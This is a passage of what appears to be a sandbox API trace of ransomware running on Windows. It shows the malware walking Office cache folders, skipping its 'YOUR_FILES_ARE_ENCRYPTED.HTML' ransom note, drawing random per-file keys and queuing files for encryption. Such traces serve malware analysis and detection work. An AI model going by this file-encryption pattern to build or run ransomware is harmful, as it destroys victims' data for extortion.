(in: param_1=0x19e0fe, param_2="%02X" | out: param_1="19") returned 2 [0111.282] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="1D") returned 2 [0111.282] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="A5") returned 2 [0111.282] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="6A") returned 2 [0111.282] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="57") returned 2 [0111.282] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="BA") returned 2 [0111.282] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="BB") returned 2 [0111.282] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="60") returned 2 [0111.282] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="BF") returned 2 [0111.282] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="E3") returned 2 [0111.282] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="61") returned 2 [0111.282] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" [0111.282] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.282] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0111.282] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5781bc17, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x5781bc17, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x9d540b29, ftLastWriteTime.dwHighDateTime=0x1d70502, nFileSizeHigh=0x0, nFileSizeLow=0x4d2aa, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="setup.exe_Rules.xml", cAlternateFileName="SETUPE~1.XML")) returned 1 [0111.282] StrStrIW (lpFirst="setup.exe_Rules.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.282] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml") returned 81 [0111.283] PathFindExtensionW (pszPath="setup.exe_Rules.xml") returned=".xml" [0111.283] lstrlenW (lpString=".xml") returned 4 [0111.283] PathFindExtensionW (pszPath="setup.exe_Rules.xml") returned=".xml" [0111.283] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\setup.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.283] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=316074) returned 1 [0111.283] GetProcessHeap () returned 0x600000 [0111.283] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c81a0 [0111.285] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="E9") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="0F") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="43") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="C6") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B7") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="BD") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="63") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="98") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="48") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="27") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="44") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="17") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="1D") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="F3") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="ED") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="36") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="5B") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="90") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="9A") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="A2") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="D8") returned 2 [0111.285] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="C7") returned 2 [0111.286] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="F9") returned 2 [0111.286] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="8F") returned 2 [0111.286] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="B4") returned 2 [0111.286] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="C9") returned 2 [0111.286] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="D3") returned 2 [0111.286] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="24") returned 2 [0111.286] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="37") returned 2 [0111.286] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="C1") returned 2 [0111.286] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="78") returned 2 [0111.286] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="71") returned 2 [0111.286] lstrcpyW (in: lpString1=0x32d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup.exe_Rules.xml" [0111.286] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x32c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.286] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c81a0, lpOverlapped=0x32c81a0) returned 1 [0111.286] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18417d03, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x18417d03, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1841a3b9, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4050, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="setup32.exe_Rules.xml", cAlternateFileName="SETUP3~1.XML")) returned 1 [0111.286] StrStrIW (lpFirst="setup32.exe_Rules.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.286] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml") returned 83 [0111.286] PathFindExtensionW (pszPath="setup32.exe_Rules.xml") returned=".xml" [0111.286] lstrlenW (lpString=".xml") returned 4 [0111.287] PathFindExtensionW (pszPath="setup32.exe_Rules.xml") returned=".xml" [0111.287] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\setup32.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.287] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=16464) returned 1 [0111.287] GetProcessHeap () returned 0x600000 [0111.287] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32f02f8 [0111.289] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="66") returned 2 [0111.289] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="65") returned 2 [0111.289] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="78") returned 2 [0111.289] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="F6") returned 2 [0111.289] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="34") returned 2 [0111.341] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="78") returned 2 [0111.341] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="3A") returned 2 [0111.341] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="BE") returned 2 [0111.341] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="EC") returned 2 [0111.341] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="6A") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="70") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="C0") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="47") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A3") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="2B") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="BB") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="0C") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="2C") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="1B") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="CC") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="22") returned 2 [0111.342] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="BB") returned 2 [0111.342] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E7") returned 2 [0111.342] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="AB") returned 2 [0111.342] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="27") returned 2 [0111.342] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="AB") returned 2 [0111.342] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="E7") returned 2 [0111.342] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="D8") returned 2 [0111.342] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="FC") returned 2 [0111.342] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="73") returned 2 [0111.342] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="88") returned 2 [0111.342] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="22") returned 2 [0111.343] lstrcpyW (in: lpString1=0x33003ac, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml" [0111.343] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x32f02f8, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.343] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32f02f8, lpOverlapped=0x32f02f8) returned 1 [0111.349] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1fe741f9, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="WebServiceCache", cAlternateFileName="WEBSER~1")) returned 1 [0111.350] StrStrIW (lpFirst="WebServiceCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.350] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache") returned 77 [0111.350] GetProcessHeap () returned 0x600000 [0111.350] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.351] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache" [0111.351] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*" [0111.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1fe741f9, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc4c65af, cFileName=".", cAlternateFileName="")) returned 0x626978 [0111.351] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1fe741f9, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc4c65af, cFileName="..", cAlternateFileName="")) returned 1 [0111.351] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1fe741f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1fe741f9, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc4c65af, cFileName="AllUsers", cAlternateFileName="")) returned 1 [0111.351] StrStrIW (lpFirst="AllUsers", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.351] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers") returned 86 [0111.351] GetProcessHeap () returned 0x600000 [0111.351] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0111.352] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers" [0111.352] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*" [0111.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82347855, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82347855, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa4, dwReserved1=0x632a08, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0111.353] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fe741f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82347855, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82347855, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa4, dwReserved1=0x632a08, cFileName="..", cAlternateFileName="")) returned 1 [0111.353] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82347855, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8b05ffa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8b05ffa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa4, dwReserved1=0x632a08, cFileName="binaries.templates.cdn.office.net", cAlternateFileName="BINARI~1.NET")) returned 1 [0111.353] StrStrIW (lpFirst="binaries.templates.cdn.office.net", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.353] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net") returned 120 [0111.353] GetProcessHeap () returned 0x600000 [0111.353] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0111.354] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net" [0111.354] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\*" [0111.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82347855, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8b05ffa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8c666c7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0111.356] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82347855, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8b05ffa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8c666c7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="..", cAlternateFileName="")) returned 1 [0111.357] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4dd6a32, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4dd6a32, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4dd6a32, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x5543, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="01B84803-3EF4-4021-9498-977CDDDA2385", cAlternateFileName="01B848~1")) returned 1 [0111.357] StrStrIW (lpFirst="01B84803-3EF4-4021-9498-977CDDDA2385", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.357] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\01B84803-3EF4-4021-9498-977CDDDA2385") returned 157 [0111.357] PathFindExtensionW (pszPath="01B84803-3EF4-4021-9498-977CDDDA2385") returned="" [0111.357] lstrlenW (lpString="") returned 0 [0111.357] PathFindExtensionW (pszPath="01B84803-3EF4-4021-9498-977CDDDA2385") returned="" [0111.357] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e03b9e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4e03b9e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4e03b9e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xaff, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="033A5E2E-F52B-4392-A855-EB1B603352F7", cAlternateFileName="033A5E~1")) returned 1 [0111.357] StrStrIW (lpFirst="033A5E2E-F52B-4392-A855-EB1B603352F7", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.357] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\033A5E2E-F52B-4392-A855-EB1B603352F7") returned 157 [0111.357] PathFindExtensionW (pszPath="033A5E2E-F52B-4392-A855-EB1B603352F7") returned="" [0111.357] lstrlenW (lpString="") returned 0 [0111.357] PathFindExtensionW (pszPath="033A5E2E-F52B-4392-A855-EB1B603352F7") returned="" [0111.357] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabb2bc31, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabb2bc31, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabb2d062, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2b3a, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="0431222D-6E07-4867-BED3-3672DEAE6648", cAlternateFileName="043122~1")) returned 1 [0111.357] StrStrIW (lpFirst="0431222D-6E07-4867-BED3-3672DEAE6648", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.357] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\0431222D-6E07-4867-BED3-3672DEAE6648") returned 157 [0111.357] PathFindExtensionW (pszPath="0431222D-6E07-4867-BED3-3672DEAE6648") returned="" [0111.357] lstrlenW (lpString="") returned 0 [0111.357] PathFindExtensionW (pszPath="0431222D-6E07-4867-BED3-3672DEAE6648") returned="" [0111.357] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82ca303e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82ca303e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82ca303e, 